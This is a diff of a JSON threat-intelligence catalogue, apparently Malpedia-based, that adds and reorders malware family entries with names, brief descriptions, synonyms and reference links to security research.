- "https://twitter.com/xuy1202/status/1393384128456794116",
- "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
"https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/",
- "https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/",
- "https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html",
"https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/",
- "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
- "https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/",
- "https://www.lacework.com/the-kek-security-network/",
"https://twitter.com/xuy1202/status/1392089568384454657",
- "https://www.lacework.com/keksec-tsunami-ryuk/"
+ "https://www.lacework.com/blog/the-kek-security-network/",
+ "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
+ "https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/",
+ "https://www.lacework.com/keksec-tsunami-ryuk/",
+ "https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr",
+ "https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html",
+ "https://github.com/lacework/lacework-labs/tree/master/keksec",
+ "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
+ "https://www.lacework.com/the-kek-security-network/",
+ "https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/",
+ "https://twitter.com/xuy1202/status/1393384128456794116"
],
"synonyms": [
"FreakOut",
@@ -10631,14 +11147,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://blog.talosintelligence.com/2020/10/poetrat-update.html",
- "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
"https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-stibnite/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
+ "https://blog.talosintelligence.com/2020/10/poetrat-update.html",
+ "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/"
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf"
],
"synonyms": [],
"type": []
@@ -10646,16 +11163,29 @@
"uuid": "b07819a9-a2f7-454d-a520-c6424cbf1ed4",
"value": "Poet RAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.powerat",
+ "https://blog.phylum.io/a-deep-dive-into-powerat-a-newly-discovered-stealer/rat-combo-polluting-pypi"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b5cb3d2b-0205-4883-aaff-0d0b7a7f032d",
+ "value": "poweRAT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
"https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
"https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://github.com/n1nj4sec/pupy"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
+ "https://github.com/n1nj4sec/pupy",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity"
],
"synonyms": [],
"type": []
@@ -10663,6 +11193,18 @@
"uuid": "afcc9bfc-1227-4bb0-a88a-5accdbfd58fa",
"value": "pupy (Python)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b9ba4f66-78dc-491f-8fd4-0143816ce80e",
+ "value": "PyAesLoader"
+ },
{
"description": "",
"meta": {
@@ -10681,8 +11223,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.pyback",
- "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001",
- "https://github.com/7h3w4lk3r/pyback"
+ "https://github.com/7h3w4lk3r/pyback",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001"
],
"synonyms": [],
"type": []
@@ -10690,13 +11232,26 @@
"uuid": "6d96cd1e-98f4-4784-9982-397c5df19bd9",
"value": "pyback"
},
+ {
+ "description": "According to Securonix, this malware exhibits remote access trojan (RAT) behavior, allowing for control of and persistence on the affected host. As with other RATs, PY#RATION possesses a whole host of features and capabilities, including data exfiltration and keylogging. What makes this malware particularly unique is its utilization of websockets for both command and control (C2) communication and exfiltration as well as how it evades detection from antivirus and network security measures.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyration",
+ "https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1dc471d3-6303-48a1-a17a-b4f29e5ba6a9",
+ "value": "PY#RATION"
+ },
{
"description": "PyVil RAT",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.pyvil",
- "https://www.cybereason.com/blog/no-rest-for-the-wicked-evilnum-unleashes-pyvil-rat",
- "https://twitter.com/ESETresearch/status/1360178593968623617"
+ "https://twitter.com/ESETresearch/status/1360178593968623617",
+ "https://www.cybereason.com/blog/no-rest-for-the-wicked-evilnum-unleashes-pyvil-rat"
],
"synonyms": [],
"type": []
@@ -10739,9 +11294,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.serpent",
- "https://blogs.vmware.com/security/2022/04/serpent-the-backdoor-that-hides-in-plain-sight.html",
"https://www.bleepingcomputer.com/news/security/serpent-malware-campaign-abuses-chocolatey-windows-package-manager/",
- "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
+ "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain",
+ "https://blogs.vmware.com/security/2022/04/serpent-the-backdoor-that-hides-in-plain-sight.html"
],
"synonyms": [],
"type": []
@@ -10826,6 +11381,20 @@
"uuid": "0bd5aed2-9c74-41a5-9fcf-9379f2cb0e2c",
"value": "Venomous"
},
+ {
+ "description": "Venus Stealer is a python based Infostealer observed early 2023.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.venus_stealer",
+ "https://geekypandatales.wordpress.com/2023/02/19/the-infostealer-pie-python-malware-analysis/",
+ "https://twitter.com/0xToxin/status/1625435116771180546"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "20f72d3c-87b7-4349-ad1b-59d7909c1df4",
+ "value": "Venus Stealer"
+ },
{
"description": "",
"meta": {
@@ -10857,15 +11426,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon",
+ "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/",
+ "https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf",
+ "https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf",
+ "https://www.clearskysec.com/cryptocore-group/",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds",
"https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf",
"https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/",
- "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/",
- "https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314",
- "https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf",
- "https://www.clearskysec.com/cryptocore-group/",
- "https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf"
+ "https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjCk7uOzMP-AhXOYMAKHYtLCKkQFnoECBIQAQ&url=https%3A%2F%2Fi.blackhat.com%2FUSA-22%2FThursday%2FUS-22-Wikoff-Talent-Need-Not-Apply.pdf&usg=AOvVaw0deqd7ozZyRTfSBOBmlbiG",
+ "https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314"
+ ],
+ "synonyms": [
+ "Cabbage RAT"
],
- "synonyms": [],
"type": []
},
"uuid": "ea71b7c1-79eb-4e9c-a670-ea75d80132f4",
@@ -10918,8 +11491,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju",
- "https://medium.com/@vishal_thakur/grinju-malware-anti-analysis-on-steroids-part-1-535e72e650b8",
- "https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce"
+ "https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce",
+ "https://medium.com/@vishal_thakur/grinju-malware-anti-analysis-on-steroids-part-1-535e72e650b8"
],
"synonyms": [],
"type": []
@@ -10932,9 +11505,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://attack.mitre.org/software/S0151/",
"https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html",
- "https://attack.mitre.org/software/S0151/"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf"
],
"synonyms": [],
"type": []
@@ -10959,32 +11532,36 @@
"value": "Iloveyou"
},
{
- "description": "Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBscript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files.\r\nThe malware targets banking clients in Portugal.",
+ "description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion",
- "https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html",
- "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf",
- "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/",
- "https://seguranca-informatica.pt/the-hidden-c2-lampion-trojan-release-212-is-on-the-rise-and-using-a-c2-server-for-two-years",
- "https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/",
- "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/",
- "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader",
- "https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing",
- "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.janicab",
+ "https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b3cb5859-2049-43d3-aed2-73db45ed0112",
+ "value": "Janicab (VBScript)"
+ },
+ {
+ "description": "Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBscript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files.\r\nThe malware targets banking clients in Portugal.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion",
+ "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf",
+ "https://seguranca-informatica.pt/the-hidden-c2-lampion-trojan-release-212-is-on-the-rise-and-using-a-c2-server-for-two-years",
+ "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader",
+ "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/",
+ "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/",
+ "https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/",
+ "https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing",
+ "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/",
+ "https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "dd299e22-bf82-4317-8c81-c6b1f7514571",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "97f89048-2a57-48d5-9272-0d1061a14eca",
"value": "lampion"
},
@@ -11011,15 +11588,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2bea2cc9-c1cc-453d-a483-541b895867d1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e9afcd80-c1c6-4194-af32-133fe31e835f",
"value": "MOUSEISLAND"
},
@@ -11054,14 +11622,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starwhale",
+ "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
"https://www.techrepublic.com/article/muddywater-targets-middle-eastern-and-asian-countries-in-phishing-attacks/",
"https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
"https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
"https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html",
+ "https://blog.talosintelligence.com/iranian-supergroup-muddywater/",
+ "https://www.govinfosecurity.com/iranian-apt-new-methods-to-target-turkey-arabian-peninsula-a-18706",
"https://rootdaemon.com/2022/03/10/iranian-hackers-targeting-turkey-and-arabian-peninsula-in-new-malware-campaign/",
- "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html",
- "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
- "https://www.govinfosecurity.com/iranian-apt-new-methods-to-target-turkey-arabian-peninsula-a-18706"
+ "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html"
],
"synonyms": [
"Canopy",
@@ -11104,6 +11673,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003",
"https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/",
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/",
"https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt"
],
"synonyms": [],
@@ -11125,6 +11695,60 @@
"uuid": "84c6b483-ba17-4a22-809d-dc37d9ce1822",
"value": "Unidentified VBS 004 (RAT)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_005",
+ "https://unit42.paloaltonetworks.com/trident-ursa/",
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8eb8ebbc-c5b1-47d8-816a-4e21dee145c3",
+ "value": "Unidentified VBS 005 (Telegram Loader)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_006",
+ "https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations",
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a6bd28db-c1a3-44b1-8bc3-7882e2896d67",
+ "value": "Unidentified VBS 006 (Telegram Loader)"
+ },
+ {
+ "description": "According to Mandiant, VBREVSHELL is a VBA macro that spawns a reverse shell relying exclusively on Windows API calls.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.vbrevshell",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "991179a0-efd5-450a-a1ce-78d1109bb50b",
+ "value": "VBREVSHELL"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.wasabiseed",
+ "https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0c6568da-7017-4d9f-b077-0c486b3f9057",
+ "value": "WasabiSeed"
+ },
{
"description": "",
"meta": {
@@ -11151,31 +11775,68 @@
"uuid": "24e598cf-4c55-468a-ac1d-cc4f89104943",
"value": "000Stealer"
},
+ {
+ "description": "According to CrowdStrike, this backdoor was discovered being embedded in a legitimate, signed version of 3CXDesktopApp, and thus constitutes a supply chain attack.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor",
+ "https://www.fortinet.com/blog/threat-research/3cx-desktop-app-compromised",
+ "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack",
+ "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/",
+ "https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html",
+ "https://www.splunk.com/en_us/blog/security/splunk-insights-investigating-the-3cxdesktopapp-supply-chain-compromise.html",
+ "https://www.reversinglabs.com/blog/red-flags-fly-over-supply-chain-compromised-3cx-update",
+ "https://github.com/dodo-sec/Malware-Analysis/blob/main/SmoothOperator/SmoothOperator.md",
+ "https://www.cadosecurity.com/forensic-triage-of-a-windows-system-running-the-backdoored-3cx-desktop-app/",
+ "https://www.group-ib.com/blog/3cx-supply-chain-attack/?utm_source=twitter&utm_campaign=3cx-blog&utm_medium=social",
+ "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html",
+ "https://www.youtube.com/watch?v=fTX-vgSEfjk",
+ "https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/",
+ "https://www.zscaler.com/security-research/3CX-supply-chain-attack-analysis-march-2023",
+ "https://blog.cyble.com/2023/03/31/a-comprehensive-analysis-of-the-3cx-attack",
+ "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
+ "https://www.rapid7.com/blog/post/2023/03/30/backdoored-3cxdesktopapp-installer-used-in-active-threat-campaign/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack",
+ "https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack",
+ "https://research.openanalysis.net/3cx/northkorea/apt/triage/2023/03/30/3cx-malware.html#Functionality",
+ "https://blogs.blackberry.com/en/2023/03/initial-implants-and-network-analysis-suggest-the-3cx-supply-chain-operation-goes-back-to-fall-2022",
+ "https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats",
+ "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
+ ],
+ "synonyms": [
+ "SUDDENICON"
+ ],
+ "type": []
+ },
+ "uuid": "b6a00e25-9d8d-4ebc-b9fc-7fd41797303b",
+ "value": "3CX Backdoor (Windows)"
+ },
{
"description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger",
- "https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
"https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger",
+ "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102",
"https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
+ "https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
"https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/",
- "https://habr.com/ru/company/group-ib/blog/477198/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89",
+ "https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware",
+ "https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/",
+ "https://twitter.com/James_inthe_box/status/1401921257109561353",
+ "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/",
+ "https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/",
"https://cert.gov.ua/article/955924",
"https://blog.netlab.360.com/purecrypter",
- "https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/",
- "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
- "https://twitter.com/James_inthe_box/status/1401921257109561353",
- "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89",
- "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/",
- "https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/",
- "https://www.youtube.com/watch?v=vzyJp2w8bPE",
- "https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware"
+ "https://habr.com/ru/company/group-ib/blog/477198/",
+ "https://www.youtube.com/watch?v=vzyJp2w8bPE"
],
"synonyms": [
"404KeyLogger",
@@ -11191,6 +11852,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
"https://github.com/securitykitten/malware_references/blob/master/crowdstrike-intelligence-report-putter-panda.original.pdf",
"https://attack.mitre.org/groups/G0024"
],
@@ -11205,8 +11867,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n",
- "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n",
- "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/"
+ "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/",
+ "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n"
],
"synonyms": [],
"type": []
@@ -11219,27 +11881,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper",
- "https://blog.malwarelab.pl/posts/on_the_royal_road/",
+ "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/",
"https://community.riskiq.com/article/5fe2da7f",
- "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://blog.malwarelab.pl/posts/on_the_royal_road/",
+ "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f",
+ "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
"https://securelist.com/cycldek-bridging-the-air-gap/97157/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf",
+ "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba",
+ "https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf",
+ "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/",
+ "https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241",
"https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/",
"https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
- "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
- "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
- "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
- "https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f",
- "https://www.accenture.com/_acnmedia/pdf-96/accenture-security-mudcarp.pdf",
- "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?",
- "https://community.riskiq.com/article/56fa1b2f",
- "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/",
- "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://malgamy.github.io/malware-analysis/The-Approach-of-TA413-for-Tibetan-Targets/#third-stage",
+ "https://medium.com/@Sebdraven/new-version-of-chinoxy-backdoor-using-covid19-document-lure-83fa294c0746",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign",
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a?",
"https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
- "https://tradahacking.vn/l%C3%A0-1937cn-hay-oceanlotus-hay-lazarus-6ca15fe1b241",
- "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology"
+ "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
+ "https://community.riskiq.com/article/56fa1b2f"
],
"synonyms": [
"8t_dropper",
@@ -11255,24 +11921,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.9002",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf",
+ "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
"https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
- "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
"https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/elderwood-project-12-en.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-union",
"https://www.infopoint-security.de/medien/the-elderwood-project.pdf",
- "https://attack.mitre.org/groups/G0001/",
- "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn",
- "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
